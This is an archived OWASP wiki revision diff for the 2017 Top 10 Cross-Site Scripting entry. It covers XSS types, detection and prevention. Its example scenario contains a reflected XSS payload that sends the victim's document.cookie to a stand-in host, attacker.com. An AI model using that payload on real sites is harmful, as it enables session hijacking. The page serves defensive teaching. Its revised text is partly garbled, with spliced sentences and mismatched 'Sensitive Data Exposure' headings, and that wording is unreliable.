This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Top 10-2017 A7-Cross-Site Scripting (XSS)"

From OWASP
Jump to: navigation, search
(Launch the new page for Top 10 2017-A3-Cross-Site Scripting (XSS) (RC1) with content of 2013-A3 as a reference to compare changes)
 
Line 15: Line 15:
  
 
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2017|language=en}}
 
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2017|language=en}}
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2017|language=en}}
+
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=2|impact=2|year=2017|language=en}}
 
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2017}}
 
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2017}}
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}>
+
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.
+
Consider anyone who can send untrusted data to the system, including external users, business partners, other systems, internal users, and administrators.
 
</td>
 
</td>
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}>
+
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.
+
Attackers send text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.
 
</td>
 
</td>
  
     <td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}>
+
     <td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
[[Cross-site_Scripting_(XSS) | XSS]] is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are two different types of XSS flaws: 1) [[Cross-site_Scripting_(XSS) | Stored]] and 2) [[Cross-site_Scripting_(XSS) | Reflected]], and each of these can occur on the a) [[Types_of_Cross-Site_Scripting#Server_XSS | Server ]] or b) on the [[Types_of_Cross-Site_Scripting#Client_XSS | Client]].
+
[[Cross-site_Scripting_(XSS) | XSS]] flaws occur when an application updates a web page with attacker controlled data without properly escaping that content or using a safe JavaScript API. There are two primary categories of XSS flaws: (1) [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks Stored] and (2) [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks Reflected], and each of these can occur on the a) [[Types_of_Cross-Site_Scripting#Server_XSS | Server ]] or b) on the [[Types_of_Cross-Site_Scripting#Client_XSS | Client]]. Detection of most [[Types_of_Cross-Site_Scripting#Server_XSS | Server XSS]] flaws is fairly easy via testing or code analysis. [[Types_of_Cross-Site_Scripting#Client_XSS | Client XSS]] is very difficult to identify.
 
 
Detection of most [[Types_of_Cross-Site_Scripting#Server_XSS | Server XSS]] flaws is fairly easy via testing or code analysis. [[Types_of_Cross-Site_Scripting#Client_XSS | Client XSS]] is very difficult to identify.
 
 
</td>
 
</td>
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}>
+
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
 
Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
 
Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
 +
</td>
 +
    <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider the business value of the affected system and all the data it processes.
  
</td>
 
    <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}>Consider the business value of the affected system and all the data it processes.
 
 
Also consider the business impact of public exposure of the vulnerability.
 
Also consider the business impact of public exposure of the vulnerability.
 +
 
</td>
 
</td>
{{Top_10_2010:SummaryTableEndTemplate|year=2017}}
+
{{Top_10_2010:SummaryTableEndTemplate}}
 
 
{{Top_10:SubsectionTableBeginTemplate|type=main|year=2017}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2017|language=en}}
 
 
 
You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via server-side input validation, before including that input in the output page. Without proper output escaping or validation, such input will be treated as active content in the browser. If Ajax is being used to dynamically update the page, are you using [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf  safe JavaScript APIs]? For unsafe JavaScript APIs, encoding or validation must also be used.
 
  
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.
+
{{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2017|language=en}}
 
+
You are vulnerable to [[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]] if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have [[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]]. Ideally, you would avoid sending attacker-controllable data to [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf unsafe JavaScript APIs], but escaping (and to a lesser extent) input validation can be used to make this safe.
Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.
 
  
 +
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2017|language=en}}
 
Preventing XSS requires separation of untrusted data from active browser content.
 
Preventing XSS requires separation of untrusted data from active browser content.
# The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the [[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet | OWASP XSS Prevention Cheat Sheet]] for details on the required data escaping techniques.
+
# To avoid [[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]], the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the [[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet|OWASP XSS Prevention Cheat Sheet]] for details on the required data escaping techniques.
# Positive or “whitelist” server-side input validation is also recommended as it helps protect against XSS, but is <u>not a complete defense</u> as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
+
# To avoid [[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]], the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the [[DOM_based_XSS_Prevention_Cheat_Sheet|OWASP DOM based XSS Prevention Cheat Sheet]].
# For rich content, consider auto-sanitization libraries like OWASP’s [[AntiSamy]] or the [[OWASP_Java_HTML_Sanitizer_Project | Java HTML Sanitizer Project]].
+
# For rich content, consider auto-sanitization libraries like OWASP’s [[AntiSamy]] or the [[OWASP Java HTML Sanitizer Project|Java HTML Sanitizer Project]].
# Consider [[Content Security Policy]] (CSP) to defend against XSS across your entire site.
+
# Consider [https://en.wikipedia.org/wiki/Content_Security_Policy Content Security Policy (CSP)] to defend against XSS across your entire site.
 +
 
  
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2017|language=en}}
Line 58: Line 54:
 
{{Top_10_2010:ExampleBeginTemplate|year=2017}}<span style="color:red;">
 
{{Top_10_2010:ExampleBeginTemplate|year=2017}}<span style="color:red;">
 
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
 
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
 
+
</span>{{Top_10_2010:ExampleEndTemplate}}
</span>{{Top_10_2010:ExampleEndTemplate|year=2017}}
 
  
 
The attacker modifies the 'CC' parameter in their browser to:
 
The attacker modifies the 'CC' parameter in their browser to:
Line 68: Line 63:
 
?foo='+document.cookie</script>'.</span>
 
?foo='+document.cookie</script>'.</span>
  
</span>{{Top_10_2010:ExampleEndTemplate|year=2017}}
+
</span>{{Top_10_2010:ExampleEndTemplate}}
 
 
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
 
  
Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See A8 for info on CSRF.
+
This attack causes the victim’s session ID to be sent to the the application might employ. See 2017-A8 for info on CSRF. attacker’s website, allowing the attacker to hijack the user’s current session.  
  
 +
Note that attackers can also use XSS to defeat any  automated CSRF defense
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
 
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}

Revision as of 21:51, 22 April 2017

← A2-Broken Authentication
2017 Table of Contents

PDF version

A4-XML External Entities (XXE) →
Threat Agents / Attack Vectors Security Weakness Impacts
App Specific Exploitability
AVERAGE
Prevalence
VERY WIDESPREAD
Detectability
AVERAGE
Impact
MODERATE
Business ?

Consider anyone who can send untrusted data to the system, including external users, business partners, other systems, internal users, and administrators.

Attackers send text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.

XSS flaws occur when an application updates a web page with attacker controlled data without properly escaping that content or using a safe JavaScript API. There are two primary categories of XSS flaws: (1) Stored and (2) Reflected, and each of these can occur on the a) Server or b) on the Client. Detection of most Server XSS flaws is fairly easy via testing or code analysis. Client XSS is very difficult to identify.

Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

Consider the business value of the affected system and all the data it processes.

Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable To 'Sensitive Data Exposure'?

You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe.

Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.

How Do I Prevent 'Sensitive Data Exposure'?

Preventing XSS requires separation of untrusted data from active browser content.

  1. To avoid Server XSS, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  2. To avoid Client XSS, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the OWASP DOM based XSS Prevention Cheat Sheet.
  3. For rich content, consider auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.
  4. Consider Content Security Policy (CSP) to defend against XSS across your entire site.


Example Attack Scenarios

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in their browser to:

'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>'.

This attack causes the victim’s session ID to be sent to the the application might employ. See 2017-A8 for info on CSRF. attacker’s website, allowing the attacker to hijack the user’s current session.

Note that attackers can also use XSS to defeat any automated CSRF defense

References

OWASP

External

← A2-Broken Authentication
2017 Table of Contents

PDF version

A4-XML External Entities (XXE) →

© 2002-2017 OWASP Foundation This document is licensed under the Creative Commons Attribution-ShareAlike 3.0 license. Some rights reserved. CC-by-sa-3 0-88x31.png